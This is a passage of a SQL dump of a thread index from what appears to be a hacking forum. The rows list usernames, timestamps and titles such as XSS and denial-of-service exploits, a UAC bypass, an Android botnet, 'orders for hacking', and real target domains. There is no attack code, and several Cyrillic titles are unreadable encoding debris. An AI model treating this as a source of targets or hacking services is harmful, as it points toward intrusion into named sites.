0, 'kx00', 6, 'kx00', 1403721092, 41, 0, '', 1, 0, 0, 0, 0, '', NULL), (1080, 'Microsoft Remote Desktop Use-After-Free DoS', '', 1116, 1116, 1403721490, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403721490, 22, 0, '', 1, 0, 0, 0, 0, '', NULL), (1081, 'pay pall [xss]', '', 1117, 1117, 1403721586, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403721586, 56, 0, '', 1, 0, 0, 0, 0, '', NULL), (1438, '{$name}', '', 1587, 1587, 1407964994, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407964994, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1083, 'заказы на похек :)', '', 1119, 2146, 1411470934, 7, 0, 1, 40, 0, 1, 'Bo0om', 7, 'awert', 1403793080, 985, 4, '', 1, 1, 0, 0, 0, '', NULL), (1132, 'New invite', '', 1221, 1221, 1404694277, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404694277, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1097, 'Vulnerabilities in Australian goverment Bureau of Meteorlogy', '', 1166, 1166, 1404204058, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1404204058, 55, 0, '', 1, 0, 0, 0, 0, '', NULL), (1088, 'New invite', '', 1124, 1129, 1403860738, 2, 0, 1, 3, 0, 0, 'Invite', 2, 'w0rm', 1403798959, 40, 0, '', 1, 0, 0, 0, 0, '', NULL), (1100, 'ãÑÂ÷òøüþÑÂтø ò osCShop Webshop þт osCommerce', '', 1171, 1171, 1404235052, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1404235052, 48, 0, '', 1, 0, 0, 0, 0, '', NULL), (1101, 'https://w0rm.in - тõÑÂтøрþòðýøõ', '', 1173, 1998, 1410528486, 13, 0, 1, 11, 0, 0, 'w0rm', 1, 'lumbricus', 1404240222, 169, 0, '', 1, 1, 0, 0, 0, '', NULL), (1114, 'new invite', '', 1197, 1197, 1404461560, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404461560, 3, 0, '', 1, 0, 0, 0, 0, '', NULL), (1113, 'china.cn', '', 1196, 1215, 1404534417, 7, 0, 1, 2, 0, 0, 'Kingbeef', 3, 'Kingbeef', 1404458824, 67, 0, '', 1, 0, 0, 0, 0, '', NULL), (1111, 'new invite', '', 1194, 1194, 1404450631, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404450631, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1110, 'new invite', '', 1193, 1193, 1404426305, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404426305, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1115, 'new invite', '', 1198, 1198, 1404461645, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404461645, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1116, 'new invite', '', 1199, 1199, 1404467368, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404467368, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1437, '{$name}', '', 1586, 1586, 1407956085, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407956085, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1134, 'фþрüð ÿþôðчø ÷ðÑÂòúø', '', 1223, 1549, 1407831397, 13, 0, 1, 1, 0, 0, 'w0rm', 1, 'w0rm', 1404782723, 46, 0, '', 1, 1, 0, 0, 1, '', NULL), (1128, '{$name}', '', 1212, 1212, 1404508694, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404508694, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1133, 'New invite', '', 1222, 1222, 1404776933, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404776933, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1450, '{$name}', '', 1615, 1615, 1408180050, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1408180050, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1136, 'New invite', '', 1226, 1226, 1404809228, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404809228, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (1138, 'AntiDDoS', '', 1228, 1610, 1408125540, 13, 0, 1, 4, 0, 0, 'w0rm', 1, 'w0rm', 1404883312, 55, 0, '', 1, 1, 0, 0, 0, '', NULL), (1139, 'New invite', '', 1229, 1229, 1404937164, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1404937164, 14, 0, '', 1, 0, 0, 0, 0, '', NULL), (2373, 'cyberbuddha', '', 2836, 2836, 1443123275, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443123275, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2374, 'ematana', '', 2839, 2839, 1443136238, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443136238, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (1142, 'cinemablend.com', '', 1233, 1233, 1405026721, 7, 0, 1, 0, 0, 0, 'mb1', 25, 'mb1', 1405026721, 55, 0, '', 1, 0, 0, 0, 0, '', NULL), (1144, 'New invite', '', 1238, 1238, 1405264488, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405264488, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1143, 'New invite', '', 1235, 1235, 1405100097, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405100097, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1145, '.blackhatworld.com', '', 1239, 2270, 1436321646, 37, 0, 1, 1, 0, 0, 'w0rm', 1, 'Versus71', 1405265072, 525, 0, '', 1, 0, 0, 0, 0, '', NULL), (1146, 'New invite', '', 1240, 1240, 1405276155, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405276155, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1147, 'New invite', '', 1241, 1241, 1405277915, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405277915, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1148, 'New invite', '', 1242, 1242, 1405324090, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405324090, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1149, 'New invite', '', 1243, 1243, 1405324593, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405324593, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1150, 'New invite', '', 1244, 1244, 1405358185, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405358185, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1152, 'New invite', '', 1247, 1247, 1405462166, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405462166, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1153, 'New invite', '', 1248, 1248, 1405484713, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405484713, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1154, 'New invite', '', 1249, 1249, 1405489446, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405489446, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1155, 'New invite', '', 1250, 1250, 1405489511, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405489511, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1156, 'New invite', '', 1251, 1251, 1405491189, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405491189, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1157, 'New invite', '', 1252, 1252, 1405491266, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405491266, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1158, 'New invite', '', 1253, 1253, 1405491360, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405491360, 3, 0, '', 1, 0, 0, 0, 0, '', NULL), (1159, 'New invite', '', 1254, 1254, 1405491394, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405491394, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1160, 'New invite', '', 1255, 1255, 1405499640, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405499640, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1161, 'New invite', '', 1256, 1256, 1405499664, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405499664, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1162, 'New invite', '', 1257, 1257, 1405500092, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405500092, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1163, 'New invite', '', 1258, 1258, 1405501156, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405501156, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1164, 'New invite', '', 1259, 1259, 1405506077, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405506077, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1165, 'New invite', '', 1260, 1260, 1405514463, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405514463, 3, 0, '', 1, 0, 0, 0, 0, '', NULL), (1166, 'New invite', '', 1261, 1261, 1405514521, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405514521, 3, 0, '', 1, 0, 0, 0, 0, '', NULL), (1167, 'New invite', '', 1262, 1262, 1405519391, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405519391, 3, 0, '', 1, 0, 0, 0, 0, '', NULL), (1168, 'New invite', '', 1263, 1263, 1405520537, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405520537, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1169, 'New invite', '', 1264, 1264, 1405521353, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405521353, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1170, 'New invite', '', 1265, 1265, 1405521899, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405521899, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1171, 'New invite', '', 1266, 1266, 1405523367, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405523367, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1172, 'New invite', '', 1267, 1267, 1405523382, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405523382, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1173, 'New invite', '', 1268, 1268, 1405523389, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405523389, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1174, 'New invite', '', 1269, 1269, 1405529010, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405529010, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1219, 'New invite', '', 1329, 1329, 1406198023, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406198023, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1176, 'New invite', '', 1272, 1272, 1405531929, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405531929, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1177, 'New invite', '', 1273, 1273, 1405533837, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405533837, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1178, 'New invite', '', 1274, 1274, 1405535637, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405535637, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1179, 'New invite', '', 1275, 1275, 1405536389, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405536389, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1180, 'New invite', '', 1276, 1276, 1405539421, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405539421, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1181, 'New invite', '', 1277, 1277, 1405578947, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405578947, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1182, 'New invite', '', 1278, 1278, 1405593955, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405593955, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1183, 'New invite', '', 1279, 1279, 1405594067, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405594067, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1184, 'New invite', '', 1280, 1280, 1405597398, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405597398, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1185, 'New invite', '', 1281, 1281, 1405598770, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405598770, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1186, 'New invite', '', 1282, 1282, 1405599084, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405599084, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1187, 'New invite', '', 1283, 1283, 1405600909, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405600909, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1189, 'New invite', '', 1285, 1285, 1405625018, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405625018, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1190, 'New invite', '', 1286, 1286, 1405655972, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405655972, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1191, 'New invite', '', 1287, 1287, 1405656157, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405656157, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1192, 'New invite', '', 1288, 1288, 1405663464, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405663464, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1193, 'New invite', '', 1289, 1289, 1405669712, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405669712, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1194, 'New invite', '', 1290, 1290, 1405691651, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405691651, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1195, 'http://raspberry.ws', '', 1293, 1293, 1405707041, 10, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1405707041, 85, 0, '', 1, 0, 0, 0, 0, '', NULL), (1196, 'proclub.ws', '', 1294, 1294, 1405718951, 37, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1405718951, 366, 0, '', 1, 0, 0, 0, 0, '', NULL), (1197, 'New invite', '', 1295, 1295, 1405722042, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405722042, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1198, 'New invite', '', 1296, 1296, 1405724295, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405724295, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1199, 'New invite', '', 1297, 1297, 1405749430, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405749430, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1200, 'New invite', '', 1298, 1298, 1405777728, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405777728, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1201, 'New invite', '', 1299, 1299, 1405777762, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405777762, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1202, 'New invite', '', 1300, 1300, 1405777855, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405777855, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1203, 'New invite', '', 1301, 1301, 1405814446, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405814446, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1204, 'New invite', '', 1302, 1302, 1405877994, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405877994, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1205, 'úþýтðúты úþüðýôы.', '', 1303, 1328, 1406186682, 13, 0, 1, 5, 0, 0, 'w0rm', 1, 'Bo0om', 1405879200, 62, 0, '', 2, 0, 0, 0, 0, '', NULL), (1206, 'úþýфõрõýцøѠw0rm.in', '', 1304, 1354, 1407289075, 13, 0, 1, 3, 0, 0, 'w0rm', 1, 'w0rm', 1405879274, 62, 0, '', 1, 0, 0, 0, 0, '', NULL), (1207, 'New invite', '', 1307, 1307, 1405945485, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405945485, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1208, 'New invite', '', 1310, 1310, 1405968883, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1405968883, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1209, 'New invite', '', 1311, 1311, 1406012552, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406012552, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1210, 'New invite', '', 1312, 1312, 1406031571, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406031571, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1211, 'donbass.ua', '', 1315, 2087, 1411033122, 7, 0, 1, 6, 0, 0, 'Psych0tr1a', 11, '123', 1406059855, 79, 0, '', 1, 0, 0, 0, 0, '', NULL), (1212, 'New invite', '', 1318, 1318, 1406097812, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406097812, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1213, 'New invite', '', 1319, 1319, 1406118025, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406118025, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1214, 'New invite', '', 1320, 1320, 1406131030, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406131030, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1215, 'New invite', '', 1321, 1321, 1406135903, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406135903, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1216, 'New invite', '', 1322, 1322, 1406136813, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406136813, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1217, 'New invite', '', 1323, 1323, 1406142831, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406142831, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1221, 'New invite', '', 1333, 1333, 1406322468, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406322468, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1220, 'New invite', '', 1332, 1332, 1406262169, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406262169, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1222, 'New invite', '', 1335, 1335, 1406361292, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406361292, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1223, 'New invite', '', 1336, 1336, 1406843333, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406843333, 4, 0, '', 1, 0, 0, 0, 0, '', NULL), (1224, 'New invite', '', 1339, 1339, 1406874474, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406874474, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1225, 'New invite', '', 1341, 1341, 1406911885, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1406911885, 20, 0, '', 1, 0, 0, 0, 0, '', NULL), (1226, 'New invite', '', 1342, 1364, 1407426191, 2, 0, 1, 1, 0, 0, 'Invite', 2, 'syslink', 1406957329, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (1227, 'ukr.net', '', 1343, 1368, 1407430711, 7, 0, 1, 4, 0, 1, 'w0rm', 1, 'w0rm', 1407011062, 71, 0, '', 1, 0, 0, 0, 0, '', NULL), (1228, 'New invite', '', 1344, 1344, 1407065204, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407065204, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1229, 'New invite', '', 1345, 1345, 1407076981, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407076981, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1230, 'New invite', '', 1347, 1363, 1407426091, 2, 0, 1, 1, 0, 0, 'Invite', 2, 'syslink', 1407135055, 50, 0, '', 1, 0, 0, 0, 0, '', NULL), (1231, 'webinar.actionpay.ru', '', 1349, 1355, 1407319670, 7, 0, 1, 1, 0, 0, 'null', 9, 'awert', 1407155324, 51, 0, '', 1, 0, 0, 0, 0, '', NULL), (1232, 'UAC Bypass', '', 1352, 1352, 1407256846, 15, 0, 1, 0, 0, 0, 'syslink', 13, 'syslink', 1407256846, 70, 0, '', 1, 0, 0, 0, 0, '', NULL), (1233, 'New invite', '', 1353, 1353, 1407269479, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407269479, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1234, 'ßõрõõ÷ô', '', 1369, 1468, 1407520698, 13, 0, 1, 5, 0, 0, 'w0rm', 1, 'w0rm', 1407454152, 41, 0, '', 1, 0, 0, 0, 0, '', NULL), (1336, 'memache-dumper', '', 1477, 1477, 1407662078, 15, 0, 1, 0, 0, 0, 'syslink', 13, 'syslink', 1407662078, 73, 0, '', 1, 0, 0, 0, 0, '', NULL), (1235, 'New invite', '', 1371, 1371, 1407456339, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407456339, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1236, 'New invite', '', 1372, 1372, 1407456467, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407456467, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1237, 'New invite', '', 1373, 1373, 1407456553, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407456553, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1238, 'New invite', '', 1375, 1375, 1407459994, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407459994, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1239, 'New invite', '', 1376, 1376, 1407460952, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407460952, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1240, 'New invite', '', 1377, 1377, 1407461248, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407461248, 2, 0, '', 2, 0, 0, 0, 0, '', NULL), (1241, 'New invite', '', 1378, 1378, 1407461315, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407461315, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1335, 'Android botnet', '', 1476, 2698, 1442097667, 15, 0, 1, 2, 0, 0, 'syslink', 13, 'hunter_exploitkit', 1407661639, 146, 0, '', 1, 0, 0, 0, 0, '', NULL), (1314, 'New invite', '', 1454, 1454, 1407517045, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517045, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1315, 'New invite', '', 1455, 1455, 1407517220, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517220, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1316, 'New invite', '', 1456, 1456, 1407517231, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517231, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1317, 'New invite', '', 1457, 1457, 1407517654, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517654, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1318, 'New invite', '', 1458, 1458, 1407517680, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517680, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1319, 'New invite', '', 1459, 1459, 1407517693, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517693, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1320, 'New invite', '', 1460, 1460, 1407517746, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517746, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1321, 'New invite', '', 1461, 1461, 1407517755, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407517755, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1322, 'New invite', '', 1462, 1462, 1407518217, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407518217, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1323, 'New invite', '', 1463, 1463, 1407518305, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407518305, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1324, 'New invite', '', 1464, 1464, 1407519306, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407519306, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1328, '{$name}', '', 1469, 1469, 1407594801, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407594801, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1329, '{$name}', '', 1470, 1470, 1407611611, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407611611, 3, 0, '', 2, 0, 0, 0, 0, '', NULL), (1310, 'New invite', '', 1450, 1450, 1407503526, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407503526, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1313, 'New invite', '', 1453, 1453, 1407516189, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407516189, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1325, 'New invite', '', 1465, 1465, 1407519374, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407519374, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1326, 'New invite', '', 1466, 1466, 1407519732, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407519732, 0, 0, '', 2, 0, 0, 0, 0, '', NULL), (1327, 'New invite', '', 1467, 1467, 1407520443, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407520443, 14, 0, '', 2, 0, 0, 0, 0, '', NULL), (1330, '{$name}', '', 1471, 1471, 1407613019, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407613019, 1, 0, '', 2, 0, 0, 0, 0, '', NULL), (1331, '{$name}', '', 1472, 1472, 1407631652, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407631652, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1332, '{$name}', '', 1473, 1473, 1407645723, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407645723, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (1333, '{$name}', '', 1474, 1474, 1407650671, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407650671, 8, 0, '', 1, 0, 0, 0, 0, '', NULL), (1334, '{$name}', '', 1475, 1475, 1407650752, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407650752, 16, 0, '', 1, 0, 0, 0, 0, '', NULL), (1281, 'New invite', '', 1421, 1421, 1407478239, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407478239, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (1337, '{$name}', '', 1478, 1478, 1407666743, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407666743, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1338, '{$name}', '', 1479, 1479, 1407679024, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407679024, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1339, '{$name}', '', 1480, 1480, 1407680096, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407680096, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (1340, '{$name}', '', 1481, 1481, 1407693525, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407693525, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (1341, '{$name}', '', 1482, 1482, 1407694752, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407694752, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1342, '{$name}', '', 1483, 1483, 1407695253, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407695253, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1343, '{$name}', '', 1484, 1484, 1407698884, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407698884, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (1344, '{$name}', '', 1485, 1485, 1407698955, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407698955, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1345, '{$name}', '', 1486, 1486, 1407699098, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1407699098, 5, 0, '', 1, 0, 0, 0, 0, '', NULL), (1346, 'Media', 